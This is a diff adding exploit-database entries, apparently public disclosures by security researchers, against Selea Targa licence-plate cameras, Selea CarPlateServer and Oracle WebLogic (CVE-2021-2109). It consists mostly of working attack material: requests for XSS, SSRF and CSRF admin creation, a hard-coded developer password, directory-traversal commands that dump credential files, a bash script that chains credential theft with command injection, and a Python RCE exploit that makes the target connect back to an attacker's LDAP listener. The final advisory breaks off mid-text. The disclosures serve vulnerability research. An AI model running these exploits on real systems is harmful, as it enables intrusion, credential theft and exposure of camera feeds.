diff --git a/exploits/hardware/webapps/49454.txt b/exploits/hardware/webapps/49454.txt new file mode 100644 index 000000000..ecb1ee0f4 --- /dev/null +++ b/exploits/hardware/webapps/49454.txt @@ -0,0 +1,81 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Remote Stored XSS + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: The application suffers from a stored XSS through a POST request. The issue is +triggered when input passed to the 'files_list' parameter is not properly sanitized +before being returned to the user. This can be exploited to execute arbitrary HTML +and script code in a user's browser session in context of an affected site. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5614 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php + + +07.11.2020 + +-- + + +Remote Stored XSS: +------------------ + +POST /cgi-bin/get_file.php HTTP/1.1 +Host: 192.168.1.17 + +name=Test&files_list=

t00t

 + + +Unauthenticated Log Pollution Trigger XSS: +------------------------------------------ + +GET /get_log.php?type=system HTTP/1.1 +Host: 192.168.1.17 \ No newline at end of file diff --git a/exploits/hardware/webapps/49455.txt b/exploits/hardware/webapps/49455.txt new file mode 100644 index 000000000..fb72d511f --- /dev/null +++ b/exploits/hardware/webapps/49455.txt @@ -0,0 +1,122 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that +enables the vendor to enable configuration upload / overwrite to the affected device +using the checkManufacturer() function through an AJAX method. + +====================================================================================== +/dev.html: +---------- +... +... + function checkManufacturer(){ + var manufacturer=$.cookie('manufacturer'); + if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); } + else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();} + } + checkManufacturer(); + function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)}; + $('#set_manufacturer').click(function(){ + var manufacturer=$.cookie('manufacturer'); + if (manufacturer){ $.cookie('manufacturer',null); location.reload(); } + else{ + $.ajax({ + url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()), + timeout: 2000, + cache:false, + mimeType: 'text/plain' + }).done(function(result){ + try{ + var info=$.parseJSON(result); + if (info.auth=="OK"){ + setManufacturerTimeout(); + location.reload(); +... +... + +/cgi-bin/utils.php: +------------------- +... +... +$cmd=$_GET["cmd"]; + +if ($cmd=="DEVPASS"){ + $pwd=$_GET["pwd"]; + + $info=new StdClass(); + $info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR"; + + print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT)); + exit(); +} +... +... + +====================================================================================== + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5615 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php + + +07.11.2020 + +-- + + +$ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b +{ "auth": "OK" } + +OR + +Navigate to /dev.html and enter password: Selea781830, enable config upload. \ No newline at end of file diff --git a/exploits/hardware/webapps/49456.txt b/exploits/hardware/webapps/49456.txt new file mode 100644 index 000000000..730fdd4d5 --- /dev/null +++ b/exploits/hardware/webapps/49456.txt @@ -0,0 +1,117 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated) +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. +Input passed through the Download Archive in Storage page using get_file.php script is +not properly verified before being used to download files. This can be exploited to +disclose the contents of arbitrary and sensitive files via directory traversal attacks +and aid the attacker to disclose clear-text credentials resulting in authentication +bypass. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5616 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php + + +07.11.2020 + +-- + + +$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json +{ + "viewers": {}, + "root_pwd": "P@$$w0rd", + "operators": {} +} + +$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd +root:x:0:0:root:/root:/bin/sh +daemon:x:1:1:daemon:/usr/sbin:/bin/false +bin:x:2:2:bin:/bin:/bin/false +sys:x:3:3:sys:/dev:/bin/false +sync:x:4:100:sync:/bin:/bin/sync +mail:x:8:8:mail:/var/spool/mail:/bin/false +www-data:x:33:33:www-data:/var/www:/bin/false +operator:x:37:37:Operator:/var:/bin/false +nobody:x:99:99:nobody:/home:/bin/false +dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false + + + +POST /cgi-bin/get_file.php HTTP/1.1 +Host: 192.168.1.17 + +name=TESTINGUS&files_list=/etc/passwd + + +HTTP/1.1 200 OK +Content-Type: application/octet-stream +Content-disposition: attachment; filename="TESTINGUS.tar" +Expires: 0 +Cache-Control: must-revalidate +Pragma: public +Content-Length: 2048 +Connection: close +Date: Wed, 09 Dec 2020 01:39:57 GMT +Server: selea_httpd + +root:/root:/bin/sh +daemon:x:1:1:daemon:/usr/sbin:/bin/false +bin:x:2:2:bin:/bin:/bin/false +sys:x:3:3:sys:/dev:/bin/false +sync:x:4:100:sync:/bin:/bin/sync +mail:x:8:8:mail:/var/spool/mail:/bin/false +www-data:x:33:33:www-data:/var/www:/bin/false +operator:x:37:37:Operator:/var:/bin/false +nobody:x:99:99:nobody:/home:/bin/false +dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false \ No newline at end of file diff --git a/exploits/hardware/webapps/49457.txt b/exploits/hardware/webapps/49457.txt new file mode 100644 index 000000000..656c3f5f6 --- /dev/null +++ b/exploits/hardware/webapps/49457.txt @@ -0,0 +1,111 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated) +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the +Selea ANPR camera within several functionalities. The application parses user supplied +data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image +request or check DNS for IP notification. Since no validation is carried out on the +parameters, an attacker can specify an external domain and force the application to +make an HTTP request to an arbitrary destination host. This can be used by an external +attacker for example to bypass firewalls and initiate a service and network enumeration +on the internal network through the affected application. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5617 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php + + +07.11.2020 + +-- + + +Request: +-------- + +POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 +Host: 192.168.1.17 + +{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} + + +Response (port 80): +------------------- + +{"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19} + + +Response (port 8080): +--------------------- + +{"code": 500,"error": "Error sending notification: Connection refused"} + + +Request: +-------- + +POST /cps/test_url HTTP/1.1 +Host: 192.168.1.17 + +{"url":"http://127.0.0.1:80"}: + + +Response (port 80): +------------------- + +{"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"} + + +Response (port 8081): +--------------------- + +{"elapsed_ms": 1,"error": "Connection refused"} \ No newline at end of file diff --git a/exploits/hardware/webapps/49458.html b/exploits/hardware/webapps/49458.html new file mode 100644 index 000000000..d14e2aa46 --- /dev/null +++ b/exploits/hardware/webapps/49458.html @@ -0,0 +1,117 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: The application interface allows users to perform certain actions via HTTP requests +without performing any validity checks to verify the requests. This can be exploited to +perform certain actions with administrative privileges if a logged-in user visits a malicious +web site. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5618 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php + + +07.11.2020 + +-- + + +Add Admin: +---------- + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt new file mode 100644 index 000000000..ac1ce4bf7 --- /dev/null +++ b/exploits/hardware/webapps/49459.txt @@ -0,0 +1,67 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream +disclosure when p1.mjpg or p1.264 is called. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5619 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php + + +07.11.2020 + +-- + + +Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 +Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg \ No newline at end of file diff --git a/exploits/hardware/webapps/49460.sh b/exploits/hardware/webapps/49460.sh new file mode 100755 index 000000000..1b47cd59c --- /dev/null +++ b/exploits/hardware/webapps/49460.sh @@ -0,0 +1,109 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated) +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +#!/bin/bash +# +# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution +# +# +# Vendor: Selea s.r.l. +# Product web page: https://www.selea.com +# Affected version: Model: iZero +# Targa 512 +# Targa 504 +# Targa Semplice +# Targa 704 TKM +# Targa 805 +# Targa 710 INOX +# Targa 750 +# Targa 704 ILB +# Firmware: BLD201113005214 +# BLD201106163745 +# BLD200304170901 +# BLD200304170514 +# BLD200303143345 +# BLD191118145435 +# BLD191021180140 +# BLD191021180140 +# CPS: 4.013(201105) +# 3.100(200225) +# 3.005(191206) +# 3.005(191112) +# +# Summary: IP camera with optical character recognition (OCR) software for automatic +# number plate recognition (ANPR) also equipped with ADR system that enables it to read +# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +# this camera suitable for all installation conditions. Its built-in OCR software works +# as an automatic and independent system without the need of a computer, thus giving +# autonomy to the device even in the event of an interruption in the connection between +# the camera and the operations centre. +# +# Desc: Selea suffers from an authenticated command injection vulnerability. This can be +# exploited to inject and execute arbitrary shell commands as the www-data user through +# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated +# LFI issue an attacker can grab credentials, authenticate and execute system commands. +# +# ===================================================================================== +# /mnt/app/scripts/address_check.sh: +# ---------------------------------- +# +# 01: #!/bin/sh +# 02: . /mnt/app/scripts/env.sh +# 03: . /mnt/app/scripts/log.sh +# 04: +# 05: CMD="$1" +# 06: ADDR="$2" +# 07: PORT="$3" +# 08: +# 09: if [ "$CMD" == "ping" ]; then +# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 ) +# 11: elif [ "$CMD" == "port" ]; then +# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT" +# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 ) +# 14: fi +# 15: +# 16: echo -e "$RESULT" +# +# ===================================================================================== +# +# Tested on: GNU/Linux 3.10.53 (armv7l) +# PHP/5.6.22 +# selea_httpd +# HttpServer/0.1 +# SeleaCPSHttpServer/1.1 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5620 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php +# +# +# 07.11.2020 +# +# + + +# PoC chained exploit (as admin): +# +# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id +# Password found: testingus +# Using Authorization: YWRtaW46dGVzdGluZ3VzCg== +# Using command: id +# uid=33(www-data) gid=33(www-data) groups=33(www-data) +# +# +IP=$1 +CMD=$2 +PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'` +echo 'Password found: '${PWD} +AUTH=$(echo admin:${PWD} | base64) +echo 'Using Authorization: '${AUTH} +echo 'Using command: '${CMD} +curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")' \ No newline at end of file diff --git a/exploits/java/webapps/49461.py b/exploits/java/webapps/49461.py new file mode 100755 index 000000000..10c955f84 --- /dev/null +++ b/exploits/java/webapps/49461.py @@ -0,0 +1,203 @@ +# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated) +# Date: 2021-01-21 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html +# Vendor Homepage: https://www.oracle.com +# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1) +# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2 +# CVE: CVE-2021-2109 + +#!/usr/bin/env python3 +''' + Copyright 2021 Photubias(c) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + File name CVE-2021-2109.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar + from https://github.com/welk1n/JNDI-Injection-Exploit + to be in the same folder +''' +import urllib.request, urllib.parse, http.cookiejar, ssl +import sys, os, optparse, subprocess, threading, time + +## Static vars; change at will, but recommend leaving as is +sURL = 'http://192.168.0.100:7001' +iTimeout = 5 +oRun = None + +## Ignore unsigned certs, if any because WebLogic is default HTTP +ssl._create_default_https_context = ssl._create_unverified_context + +class runJar(threading.Thread): + def __init__(self, sJarFile, sCMD, sAddress): + self.stdout = [] + self.stderr = '' + self.cmd = sCMD + self.addr = sAddress + self.jarfile = sJarFile + self.proc = None + threading.Thread.__init__(self) + + def run(self): + self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) + for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) + for line in iter(self.proc.stderr.readline, ''): self.stderr += line + + +def findJNDI(): + sCurDir = os.getcwd() + sFile = '' + for file in os.listdir(sCurDir): + if 'JNDI' in file and '.jar' in file: + sFile = file + print('[+] Found and using ' + sFile) + return sFile + +def findJAVA(bVerbose): + try: + oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) + except: + exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') + sResult = list(oProc.stdout)[0].decode() + if bVerbose: print('[+] Found Java: ' + sResult) + +def checkParams(options, args): + if args: sHost = args[0] + else: + sHost = input('[?] Please enter the URL ['+sURL+'] : ') + if sHost == '': sHost = sURL + if sHost[-1:] == '/': sHost = sHost[:-1] + if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost + if options.username: sUser = options.username + else: + sUser = input('[?] Username [weblogic] : ') + if sUser == '': sUser = 'weblogic' + if options.password: sPass = options.password + else: + sPass = input('[?] Password [Passw0rd-] : ') + if sPass == '': sPass = 'Passw0rd-' + if options.command: sCMD = options.command + else: + sCMD = input('[?] Command to run [calc] : ') + if sCMD == '': sCMD = 'calc' + if options.listenaddr: sLHOST = options.listenaddr + else: + sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ') + if sLHOST == '': sLHOST = '192.168.0.10' + if options.verbose: bVerbose = True + else: bVerbose = False + return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) + +def startListener(sJarFile, sCMD, sAddress, bVerbose): + global oRun + oRun = runJar(sJarFile, sCMD, sAddress) + oRun.start() + print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') + oRun.join(3) + if not oRun.stderr == '': + exit('[-] Error starting Java listener:\n' + oRun.stderr) + bThisLine=False + if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') + for line in oRun.stdout: + if bThisLine: return line.split('/')[3].replace('\n','') + if 'JDK 1.8' in line: bThisLine = True + +def endIt(): + global oRun + print('[+] Closing threads') + if oRun: oRun.proc.terminate() + exit(0) + +def main(): + usage = ( + 'usage: %prog [options] URL \n' + ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' + ' in the current working folder\n' + 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' + 'Only works when hacker is reachable via an IPv4 address\n' + 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' + 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n' + 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' + ) + + parser = optparse.OptionParser(usage=usage) + parser.add_option('--username', '-u', dest='username') + parser.add_option('--password', '-p', dest='password') + parser.add_option('--command', '-c', dest='command') + parser.add_option('--listen', '-l', dest='listenaddr') + parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) + + ## Get or ask for the vars + (options, args) = parser.parse_args() + (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) + + ## Verify Java and JAR file + sJarFile = findJNDI() + findJAVA(bVerbose) + + ## Keep track of cookies between requests + cj = http.cookiejar.CookieJar() + oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + + print('[+] Verifying reachability') + ## Get the cookie + oRequest = urllib.request.Request(url = sHost + '/console/') + oResponse = oOpener.open(oRequest, timeout = iTimeout) + for c in cj: + if c.name == 'ADMINCONSOLESESSION': + if bVerbose: print('[+] Got cookie "' + c.value + '"') + + ## Logging in + lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} + lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} + oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + sResult = oResponse.read().decode(errors='ignore').split('\r\n') + bSuccess = True + for line in sResult: + if 'Authentication Denied' in line: bSuccess = False + if bSuccess: print('[+] Succesfully logged in!\n') + else: exit('[-] Authentication Denied') + + ## Launch the LDAP listener and retrieve the random endpoint value + sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) + if bVerbose: print('[+] Got Java value: ' + sRandom) + + ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1" + print('\n[+] Firing exploit now, hold on') + ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-) + sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] + sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' + if bVerbose: print('[!] Using URL ' + sFullUrl) + oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + time.sleep(5) + bExploitWorked = False + for line in oRun.stdout: + if 'Log a request' in line: bExploitWorked = True + if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') + if not bExploitWorked: print('[-] Exploit failed, victim likely patched') + else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') + if bVerbose: print(oRun.stderr) + endIt() + +if __name__ == "__main__": + try: main() + except KeyboardInterrupt: endIt() \ No newline at end of file diff --git a/exploits/multiple/webapps/49452.txt b/exploits/multiple/webapps/49452.txt new file mode 100644 index 000000000..59c937ad6 --- /dev/null +++ b/exploits/multiple/webapps/49452.txt @@ -0,0 +1,286 @@ +# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution +# Date: 08.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: 4.0.1.6(210120) + 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: Our CPS (Car Plate Server) software is an advanced solution that can +be installed on computers and servers and used as an operations centre. It can +create sophisticated traffic control and road safety systems connecting to +stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert +notifications directly to tablets or smartphones, it can receive and transfer +data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution +that offers full integration with main video surveillance software. Our 